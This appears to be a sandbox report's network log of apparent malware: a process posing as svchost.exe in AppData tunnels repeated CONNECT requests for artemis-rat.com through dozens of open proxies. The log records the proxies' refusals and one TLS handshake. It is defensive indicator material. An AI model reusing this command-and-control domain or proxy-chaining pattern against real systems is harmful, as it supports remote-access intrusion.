Mar 9, 2024 13:14:37.262878895 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.898073912 CET	221	IN	HTTP/1.1 403 Access Denied Date: Sat, 09 Mar 2024 12:14:37 GMT Connection: close Cache-Control: no-store Content-Type: text/html Content-Language: en Content-Length: 43 Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e Data Ascii: You are not allowed to access the document.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3593	192.168.2.5	61317	1.15.62.12	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.263149023 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3594	192.168.2.5	61319	45.138.87.238	1080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.277570963 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3595	192.168.2.5	61314	91.241.217.58	9090	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.279592037 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3596	192.168.2.5	61330	119.196.168.183	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.279642105 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3597	192.168.2.5	61422	172.67.36.21	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.282876015 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.437360048 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:37 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3598	192.168.2.5	61419	43.153.22.29	10005	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.299537897 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:37.474549055 CET	39	IN	HTTP/1.1 200 Connection established
Mar 9, 2024 13:14:37.474767923 CET	160	IN	HTTP/1.1 401 UnauthorizedContent-Type: text/plain; charset=utf-8WWW-Authenticate: Basic realm="proxy"errorMsg: The IP specified by the port is not availabl Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3599	192.168.2.5	57697	51.89.173.40	55198	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.313622952 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3600	192.168.2.5	60098	98.178.72.21	10919	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.408154011 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3601	192.168.2.5	57789	182.93.69.74	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.408437014 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3602	192.168.2.5	60965	139.224.64.191	8081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.408673048 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.738758087 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3603	192.168.2.5	61148	180.250.159.49	4153	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.411442995 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3604	192.168.2.5	60102	51.75.206.209	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.428567886 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3605	192.168.2.5	60129	18.133.16.21	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.444691896 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.764921904 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:37 GMT Server: nginx Content-Type: text/plain Content-Length: 0
Mar 9, 2024 13:14:37.767570972 CET	177	OUT	Data Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ec 52 ac ad 0d b6 b9 b7 f1 ea 81 06 b6 45 1a 51 0e e9 f0 d3 12 84 4d e4 a8 e4 52 0c e3 f7 11 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c Data Ascii: eREQMR*,+0/$#('=<5/Uartemis-rat.com#
Mar 9, 2024 13:14:38.060091019 CET	536	IN	Data Raw: 16 03 03 00 3d 02 00 00 39 03 03 29 76 93 28 8e 88 f3 e2 c7 51 5f c2 ad ce b1 0d 3f 18 05 34 4c 64 c9 25 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30 Data Ascii: =9)v(Q_?4Ld%DOWNGRD0000H010Uartemis-rat.com0240309112140Z260309112140Z010Uartemis-rat.com0"0H0_9Q
Mar 9, 2024 13:14:38.060184002 CET	536	IN	Data Raw: 0f fa 08 18 4c fe 64 12 dd 31 cc e3 20 6a d4 dd 4e 90 c1 cb 8a a5 af de 21 13 8f 1c f8 7f 94 a4 d2 e9 f0 87 be a3 48 8e 21 6a 74 44 c0 8b b4 a6 47 cf d5 07 dc 22 cc e0 8d ef 2b d8 78 c0 bf a3 6c bf aa c2 47 47 bf 31 78 24 88 1c 40 19 a7 89 6d 22 Data Ascii: Ld1 jN!H!jtDG"+xlGG1x$@m"g2CYZA9Rz(.K`3ty0qGGU#Q.`d&6(;*%rgKy3H4$ho4NwC,( 6
Mar 9, 2024 13:14:38.060200930 CET	7	IN	Data Raw: 03 00 04 0e 00 00 00 Data Ascii:
Mar 9, 2024 13:14:38.073204994 CET	93	OUT	Data Raw: 16 03 03 00 25 10 00 00 21 20 c9 bb be 17 a6 74 45 d4 0b 5d 22 4d 06 86 4d 55 93 6c 85 51 54 3b a6 c8 7a 46 24 22 11 2e 8f 05 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 58 c7 9d 04 38 89 49 43 cc 7a a2 37 28 fc 03 b9 6e 03 82 d9 1e Data Ascii: %! tE]"MMUlQT;zF$".(X8ICz7(ngCX@
Mar 9, 2024 13:14:38.364908934 CET	51	IN	Data Raw: 14 03 03 00 01 01 16 03 03 00 28 51 6a 6d 2c 90 da f4 7c 05 58 66 1c 62 8f a7 eb 47 a2 54 56 34 da 9b 8b ea 11 7d 1d 3d 73 13 7e 44 3f ce b6 03 7a 67 e3 Data Ascii: (Qjm,\|XfbGTV4}=s~D?zg

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3606	192.168.2.5	58056	212.110.188.207	34405	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.447839022 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3607	192.168.2.5	61360	106.105.218.244	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.451615095 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:38.378102064 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3608	192.168.2.5	61343	212.50.19.150	4153	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.456511974 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3609	192.168.2.5	61433	104.25.184.189	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.456541061 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.610843897 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:37 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3610	192.168.2.5	61424	107.180.90.42	10670	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.456722975 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3611	192.168.2.5	61383	138.2.73.157	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.488590956 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3612	192.168.2.5	61464	104.18.234.218	80	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.492258072 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.646573067 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:37 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3613	192.168.2.5	61432	35.185.196.38	3128	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.492444038 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.705430031 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3614	192.168.2.5	57977	185.236.46.221	5678	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.493139029 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3615	192.168.2.5	61438	157.185.157.151	26589	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.511221886 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3616	192.168.2.5	61386	198.199.86.11	8080	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.512289047 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3617	192.168.2.5	61293	124.163.236.54	7302	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.512604952 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.979763985 CET	90	IN	HTTP/1.1 200 OK Content-Type: application/json Connection: close Content-Length: 55

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3618	192.168.2.5	61441	94.131.63.44	3128	43220	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:37.516693115 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.740281105 CET	1260	IN	HTTP/1.1 403 Forbidden Server: squid/6.0.0-20220501-re899e0c27 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:37 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3670 X-Squid-Error: ERR_ACCESS_DENIED 0 Vary: Accept-Language Content-Language: en Cache-Status: ezproxies.com Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27) Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 Data Ascii: 